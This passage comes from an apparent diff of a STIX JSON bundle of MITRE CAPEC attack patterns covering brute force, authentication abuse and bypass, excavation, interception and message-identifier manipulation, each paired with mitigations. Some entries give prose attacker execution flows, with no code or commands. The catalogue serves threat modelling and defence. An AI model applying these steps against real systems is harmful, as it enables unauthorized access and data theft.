session.", + "id": "course-of-action--9085eee9-2f7e-4b3b-bbea-dbc4f0d0044f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce344fe2-2f03-491f-a465-a5e7578ca3aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9085eee9-2f7e-4b3b-bbea-dbc4f0d0044f", + "spec_version": "2.1", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario.", + "id": "course-of-action--ec731c48-7174-45e1-85e5-b82150c25e2f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ccdf4c19-dc2a-46b4-b444-b78da5d0300f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec731c48-7174-45e1-85e5-b82150c25e2f", + "spec_version": "2.1", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset.", + "external_references": [ + { + "external_id": "CAPEC-112", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Brute Force", + "external_id": "T1110", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110" + }, + { + "description": "Brute Force", + "external_id": "11", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Brute-Force" + }, + { + "description": "Brute force attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Brute_force_attack" + } + ], + "id": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Brute Force", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine secret testing procedure: Determine how a potential guess of the secret may be tested. This may be accomplished by comparing some manipulation of the secret to a known value, use of the secret to manipulate some known set of data and determining if the result displays specific characteristics (for example, turning cryptotext into plaintext), or by submitting the secret to some external authority and having the external authority respond as to whether the value was the correct secret. Ideally, the attacker will want to determine the correctness of their guess independently since involvement of an external authority is usually slower and can provide an indication to the defender that a brute-force attack is being attempted.

    2. Techniques
    Determine if there is a way to parallelize the attack. Most brute force attacks can take advantage of parallel techniques by dividing the search space among available resources, thus dividing the average time to success by the number of resources available. If there is a single choke point, such as a need to check answers with an external authority, the attackers' position is significantly degraded.

  2. Reduce search space: Find ways to reduce the secret space. The smaller the attacker can make the space they need to search for the secret value, the greater their chances for success. There are a great many ways in which the search space may be reduced.

    3. Techniques
    If possible, determine how the secret was selected. If the secret was determined algorithmically (such as by a random number generator) the algorithm may have patterns or dependencies that reduce the size of the secret space. If the secret was created by a human, behavioral factors may, if not completely reduce the space, make some types of secrets more likely than others. (For example, humans may use the same secrets in multiple places or use secrets that look or sound familiar for ease of recall.)
    If the secret was chosen algorithmically, cryptanalysis can be applied to the algorithm to discover patterns in this algorithm. (This is true even if the secret is not used in cryptography.) Periodicity, the need for seed values, or weaknesses in the generator all can result in a significantly smaller secret space.
    If the secret was chosen by a person, social engineering and simple espionage can indicate patterns in their secret selection. If old secrets can be learned (and a target may feel they have little need to protect a secret that has been replaced) hints as to their selection preferences can be gleaned. These can include character substitutions a target employs, patterns in sources (dates, famous phrases, music lyrics, family members, etc.). Once these patterns have been determined, the initial efforts of a brute-force attack can focus on these areas.
    Some algorithmic techniques for secret selection may leave indicators that can be tested for relatively easily and which could then be used to eliminate large areas of the search space for consideration. For example, it may be possible to determine that a secret does or does not start with a given character after a relatively small number of tests. Alternatively, it might be possible to discover the length of the secret relatively easily. These discoveries would significantly reduce the search space, thus increasing speed with which the attacker discovers the secret.

  3. Expand victory conditions: It is sometimes possible to expand victory conditions. For example, the attacker might not need to know the exact secret but simply needs a value that produces the same result using a one-way function. While doing this does not reduce the size of the search space, the presence of multiple victory conditions does reduce the likely amount of time that the attacker will need to explore the space before finding a workable value.

Exploit

  1. Gather information so attack can be performed independently.: If possible, gather the necessary information so a successful search can be determined without consultation of an external authority. This can be accomplished by capturing cryptotext (if the goal is decoding the text) or the encrypted password dictionary (if the goal is learning passwords).

", + "x_capec_extended_description": "\n Examples of secrets can include, but are not limited to, passwords, encryption keys, database lookup keys, and initial values to one-way functions. The key factor in this attack is the attackers' ability to explore the possible secret space rapidly. This, in turn, is a function of the size of the secret space and the computational power the attacker is able to bring to bear on the problem. If the attacker has modest resources and the secret space is large, the challenge facing the attacker is intractable. Assuming a finite secret space, a brute force attack will eventually succeed. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_prerequisites": [ + "The attacker must be able to determine when they have successfully guessed the secret. As such, one-time pads are immune to this type of attack since there is no way to determine when a guess is correct." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources the attacker has at their disposal. This attack method is resource expensive: having large amounts of computational power do not guarantee timely success, but having only minimal resources makes the problem intractable against all but the weakest secret selection procedures." + ], + "x_capec_skills_required": { + "Low": "The attack simply requires basic scripting ability to automate the exploration of the search space. More sophisticated attackers may be able to use more advanced methods to reduce the search space and increase the speed with which the secret is located." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space.", + "id": "course-of-action--6863b358-1e48-48e0-b084-56c5cc603fb4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc237ef1-9283-4680-b8d0-9ef4a0cf8147", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6863b358-1e48-48e0-b084-56c5cc603fb4", + "spec_version": "2.1", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a secret space that is well known and with no known patterns that may reduce functional size.", + "id": "course-of-action--aaaca7bd-c8e3-477f-8457-0dd2fa58b41c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c266ae48-e3db-42b8-b3ce-57936242fa62", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aaaca7bd-c8e3-477f-8457-0dd2fa58b41c", + "spec_version": "2.1", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext.", + "id": "course-of-action--4cce5adb-bd38-46a1-b756-9c85290ad8e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--720b2d97-9125-482c-b7b3-c17acce30c06", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4cce5adb-bd38-46a1-b756-9c85290ad8e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the use or processing of an interface (e.g. Application Programming Interface (API) or System-on-Chip (SoC)) resulting in an adverse impact upon the security of the system implementing the interface. This can allow the adversary to bypass access control and/or execute functionality not intended by the interface implementation, possibly compromising the system which integrates the interface. Interface manipulation can take on a number of forms including forcing the unexpected use of an interface or the use of an interface in an unintended way.", + "external_references": [ + { + "external_id": "CAPEC-113", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-1192", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1192.html" + } + ], + "id": "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Interface Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary may make a request to an application that leverages a non-standard API that is known to incorrectly validate its data and thus it may be manipulated by supplying metacharacters or alternate encodings as input, resulting in any number of injection flaws, including SQL injection, cross-site scripting, or command execution.", + "API methods not intended for production, such as debugging or testing APIs, may not be disabled when deploying in a production environment. As a result, dangerous functionality can be exposed within the production environment, which an adversary can leverage to execute additional attacks.", + "SoC components contain insufficient identifiers, which allows an adversary to reset the device at will or read sensitive data from the device." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "attack-pattern--f90601a6-9e18-4e96-804d-01a4f4ea30f2", + "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5" + ], + "x_capec_prerequisites": [ + "The target system must expose interface functionality in a manner that can be discovered and manipulated by an adversary. This may require reverse engineering the interface or decrypting/de-obfuscating client-server exchanges." + ], + "x_capec_resources_required": [ + "The requirements vary depending upon the nature of the interface. For example, application-layer APIs related to the processing of the HTTP protocol may require one or more of the following: an Adversary-In-The-Middle (CAPEC-94) proxy, a web browser, or a programming/scripting language." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.", + "external_references": [ + { + "external_id": "CAPEC-114", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/114.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-1244", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1244.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + } + ], + "id": "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Authentication Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the \"Exploitation of Session Variables, Resource IDs and other Trusted Credentials\" attack patterns.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a" + ], + "x_capec_prerequisites": [ + "An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. which is flawed in some way." + ], + "x_capec_resources_required": [ + "A client application, command-line access to a binary, or scripting language capable of interacting with the authentication mechanism." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place.", + "external_references": [ + { + "external_id": "CAPEC-115", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/115.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-598", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.html" + } + ], + "id": "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Authentication Bypass", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6" + ], + "x_capec_prerequisites": [ + "An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc." + ], + "x_capec_resources_required": [ + "A client application, such as a web browser, or a scripting language capable of interacting with the target." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-116", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-1243", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1243.html" + } + ], + "id": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Excavation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_extended_description": "\n This is achieved by exploring the target via ordinary interactions for the purpose of gathering intelligence about the target, or by sending data that is syntactically invalid or non-standard in an attempt to produce a response that contains the desired data. As a result of these interactions, the adversary is able to obtain information from the target that aids the attacker in making inferences about its security, configuration, or potential vulnerabilities. Examplar exchanges with the target may trigger unhandled exceptions or verbose error messages that reveal information like stack traces, configuration information, path information, or database design. This type of attack also includes the manipulation of query strings in a URI to produce invalid SQL queries, or by trying alternative path values in the hope that the server will return useful information.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1", + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_prerequisites": [ + "An adversary requires some way of interacting with the system." + ], + "x_capec_resources_required": [ + "A tool, such as an Adversary in the Middle (CAPEC-94) Proxy or a fuzzer, that is capable of generating and injecting custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Minimize error/response output to only what is necessary for functional use or corrective language.", + "id": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-116-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04", + "spec_version": "2.1", + "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remove potentially sensitive information that is not necessary for the application's functionality.", + "id": "course-of-action--f79678b2-0a62-418a-907b-5e73dd03e3bc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-116-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1a976d5b-38ec-4508-8329-3a6a82d44d97", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f79678b2-0a62-418a-907b-5e73dd03e3bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position themself so as to observe explicit data channels (e.g. network traffic) and read the content. However, this attack differs from a Adversary-In-the-Middle (CAPEC-94) attack, as the adversary does not alter the content of the communications nor forward data to the intended recipient.", + "external_references": [ + { + "external_id": "CAPEC-117", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + } + ], + "id": "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Interception", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Physical Security" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_prerequisites": [ + "The target must transmit data over a medium that is accessible to the adversary." + ], + "x_capec_resources_required": [ + "The adversary must have the necessary technology to intercept information passing between the nodes of a network. For TCP/IP, the capability to run tcpdump, ethereal, etc. can be useful. Depending upon the data being targeted the technological requirements will change." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage encryption to encode the transmission of data thus making it accessible only to authorized parties.", + "id": "course-of-action--2e4a2bce-d5ab-429d-91d4-b26c22f7f02b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-117-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--859073fb-487f-4a31-b50e-4cceb762f731", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e4a2bce-d5ab-429d-91d4-b26c22f7f02b", + "spec_version": "2.1", + "target_ref": "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.", + "external_references": [ + { + "external_id": "CAPEC-12", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/12.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + } + ], + "id": "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Choosing Message Identifier", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "A certain B2B interface on a large application codes for messages passed over an MQSeries queue, on a single \"Partners\" channel. Messages on that channel code for their client destination based on a partner_ID field, held by each message. That field is a simple integer. Adversaries having access to that channel, perhaps a particularly nosey partner, can simply choose to store messages of another partner's ID and read them as they desire. Note that authentication does not prevent a partner from leveraging this attack on other partners. It simply disallows adversaries without partner status from conducting this attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Nature of Messages: Determine the nature of messages being transported as well as the identifiers to be used as part of the attack

Experiment

  1. Authenticate: If required, authenticate to the distribution channel

  2. Identify Known Client Identifiers: If any particular client's information is available through a control channel available to all users, the adversary will discover particular identifiers for targeted clients by observing this channel, or requesting client information through this channel.

  3. Change Message Identifier: Adversaries with client access connecting to output channels could change their channel identifier and see someone else's (perhaps more privileged) data.

